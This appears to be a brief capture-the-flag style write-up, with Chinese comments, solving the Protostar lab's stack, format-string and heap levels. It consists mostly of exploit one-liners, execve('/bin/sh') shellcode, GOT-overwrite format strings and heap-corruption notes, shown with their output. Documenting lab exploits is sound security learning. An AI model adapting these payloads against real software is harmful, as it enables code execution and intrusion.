stack0
$ python -c "print 0x44*'a'" | ./stack0 you have changed the 'modified' variable
|
stack1
$ python -c "print 0x40*'a'+'\x64\x63\x62\x61'" | xargs ./stack1 you have correctly got the variable to the right value
|
stack2
import os payload = 'a'*0x40 + '\x0a\x0d\x0a\x0d' os.putenv("GREENIE", payload) os.system("./stack2")
|
stack3
$ readelf -a stack3 | grep win There are no unwind sections in this file. 56: 08048424 20 FUNC GLOBAL DEFAULT 14 win $ python -c "print 0x40*'a'+'\x24\x84\x04\x08'" | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed
|
stack 4
$ readelf -a stack4 | grep win There are no unwind sections in this file. 56: 080483f4 20 FUNC GLOBAL DEFAULT 14 win $ python -c "print 76*'a'+'\xf4\x83\x04\x08'"|./stack4 code flow successfully changed
|
stack5
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : disabled
|
系统没开ASLR。让程序崩溃,调试core dump获得stack address。
python -c "print 0x4c*'a'+'\x10\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack5
|
stack6
return addr => addr(ret) => stack addr
python -c "print 0x50*'a'+'\x08\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6
|
stack7
python -c "print 0x50*'a'+'\x53\x85\x04\x08'+'\x04\xfd\xff\xbf'+'\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'" | ./stack6
|
root@protostar:/opt/protostar/bin you have hit the target correctly :)
|
%128$n
代表第128个参数,argv会放在栈上。
root@protostar:/opt/protostar/bin
|
[-------------------------------------code-------------------------------------] 0x8048477 <vuln+35>: call 0x804835c <fgets@plt> 0x804847c <vuln+40>: lea eax,[ebp-0x208] 0x8048482 <vuln+46>: mov DWORD PTR [esp],eax => 0x8048485 <vuln+49>: call 0x804837c <printf@plt> 0x804848a <vuln+54>: mov eax,ds:0x80496e4 0x804848f <vuln+59>: cmp eax,0x40 0x8048492 <vuln+62>: jne 0x80484a2 <vuln+78> 0x8048494 <vuln+64>: mov DWORD PTR [esp],0x8048590 Guessed arguments: arg[0]: 0xffffd450 ("aaaaaa\n") [------------------------------------stack-------------------------------------] 0000| 0xffffd440 --> 0xffffd450 ("aaaaaa\n") 0004| 0xffffd444 --> 0x200 0008| 0xffffd448 --> 0xf7fc2c20 --> 0xfbad2288 0012| 0xffffd44c --> 0xf7fec308 (<_dl_check_map_versions+632>: mov edi,eax) 0016| 0xffffd450 ("aaaaaa\n")
|
exploit:
root@protostar:/opt/protostar/bin .0000000000000000000000000000000000000000000000000000080496e4 you have modified the target :)
|
python -c "print '\xf4\x96\x04\x08%12\$016930112x%12\$n'" | ./format3
|
看了我的方法还是有点弱- -,基本就是一字节写比较好的方法
python -c 'print "\xf4\x96\x04\x08"+"\xf5\x96\x04\x08"+"\xf6\x96\x04\x08"+"\xf7\x96\x04\x08"+"%52x%12$n%13$n%14$n%15$n"' | ./format3 target is 44444444 :(
|
写exit的GOT表中的数据,GOT["exit"]=0x08049724
,单字节写入。
python -c "print '\x24\x97\x04\x08\x25\x97\x04\x08\x26\x97\x04\x08\x27\x97\x04\x08'+'%0164x%4\$n%0208x%5\$n%0128x%6\$n%260x%7\$n'" | ./format4
|
heap0
winner = 0x08048464
root@protostar:/opt/protostar/bin data is at 0x804a008, fp is at 0x804a050 level passed
|
heap1
GOT[“puts”] = 0x08049774
winner = 0x08048494
没啥说的,把第二个指针覆盖为puts的got地址,第二次strcpy把winner写入puts的got表中
root@protostar:/opt/protostar/bin and we have a winner @ 1491862467
|
heap2
很明显的UAF,struct auth = 36字节,先创建auth,再free再用strdup分配36字节大小的空间即可。
[ auth = (nil), service = (nil) ] auth aaaaa [ auth = 0x903d008, service = (nil) ] reset [ auth = 0x903d008, service = (nil) ] serviceaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa [ auth = 0x903d008, service = 0x903d018 ] login you have logged in already! [ auth = 0x903d008, service = 0x903d018 ]
|
heap3
unlink导致任意地址写
root@protostar:/opt/protostar/bin that wasn't too bad now, was it? @ 1491865342
|